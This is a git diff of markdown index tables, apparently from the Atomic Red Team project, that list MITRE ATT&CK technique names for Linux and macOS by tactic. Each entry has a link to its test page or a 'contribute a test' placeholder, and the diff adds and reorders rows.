+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Unix Shell](../../T1059.004/T1059.004.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
+| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](../../T1070.004/T1070.004.md) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Trap](../../T1546.005/T1546.005.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | [Local Account](../../T1136.001/T1136.001.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
+| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
+| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
+| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Systemd Service](../../T1543.002/T1543.002.md) | | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Network Address Translation Traversal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Trap](../../T1546.005/T1546.005.md) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
+| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Reduce Key Space [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
| | | | | Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
@@ -61,13 +71,16 @@
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | | | | | | | |
| | | | | [System Checks](../../T1497.001/T1497.001.md) | | | | | | | |
+| | | | | TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Weaken Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
diff --git a/atomics/Indexes/Matrices/macos-matrix.md b/atomics/Indexes/Matrices/macos-matrix.md
index f82dd981..952efc86 100644
--- a/atomics/Indexes/Matrices/macos-matrix.md
+++ b/atomics/Indexes/Matrices/macos-matrix.md
@@ -1,32 +1,32 @@
# macOS Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Local Groups](../../T1069.001/T1069.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify System Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Keychain](../../T1555.001/T1555.001.md) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [GUI Input Capture](../../T1056.002/T1056.002.md) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
